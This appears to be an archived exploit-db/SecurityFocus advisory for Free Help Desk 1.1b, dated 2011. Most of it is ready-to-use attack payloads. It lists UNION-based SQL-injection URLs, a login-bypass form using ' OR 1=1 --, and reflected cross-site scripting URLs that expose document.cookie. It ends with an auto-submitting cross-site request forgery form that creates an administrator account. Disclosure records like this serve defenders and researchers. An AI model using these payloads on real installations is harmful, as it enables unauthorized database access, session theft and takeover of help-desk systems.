Free Help Desk 1.1b – Multiple Input Validation Vulnerabilities

  • 作者: High-Tech Bridge SA
    日期: 2011-09-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36147/
  • source: https://www.securityfocus.com/bid/49721/info
    
    Free Help Desk is prone to the following input-validation vulnerabilities:
    
    1. A cross-site scripting vulnerability
    2. Multiple SQL-injection vulnerabilities
    3. A cross-site request-forgery vulnerability
    
    Exploiting these issues could allow an attacker to execute arbitrary code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
    
    Free Help Desk 1.1b is vulnerable; other versions may also be affected. 
    
    SQL injection:
    
    URIs
    
    http://www.example.com/index.php?sub=users&action=edit&user_id=-1%27%20union%20select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20+--+
    http://www.example.com/index.php?sub=types&action=edit&type_id=123%27%20union%20select%201,2,version%28%29,4,5,6%20+--+
    http://www.example.com/index.php?sub=help&action=details&call_id=1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20+--+
    http://www.example.com/index.php?sub=help&call_first_name=%22%20and%201=1%20+--+
    
    Inputs:
    
    <form action="http://www.example.com/index.php" method="post">
    <input type="hidden" name="user" value="' OR 1=1 -- ">
    <input type="hidden" name="pass" value="1">
    <input name="send" value="exploit" type="submit">
    </form>
    
    
    Cross-site scripting:
    
    URIs
    
    http://www.example.com/index.php?sub=types&action=add&type=1&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://www.example.com/index.php?sub=types&action=edit&type_id=15&type=1&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://www.example.com/index.php?sub=types&action=add&type=2&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://www.example.com/index.php?sub=types&action=edit&type_id=8&type=2&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://www.example.com/index.php?sub=staff&action=add&type=&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://www.example.com/index.php?sub=staff&action=edit&type_id=7&type=&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://www.example.com/index.php?sub=types&action=add&type=3&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    
    Cross-site request-forgery:
    
    Input:
    
    <form action="http://www.example.com/index.php?sub=users&action=store&type=add" method="post">
    <input type="hidden" name="user_id" value="">
    <input type="hidden" name="user_name" value="newadmin">
    <input type="hidden" name="user_login" value="newadmin">
    <input type="hidden" name="user_password" value="123456">
    <input type="hidden" name="user_password_confirm" value="123456">
    <input type="hidden" name="user_level" value="0">
    <input type="hidden" name="user_email" value="">
    <input type="submit" id="btn"> 
    </form>
    <script>
    document.getElementById('btn').click();
    </script>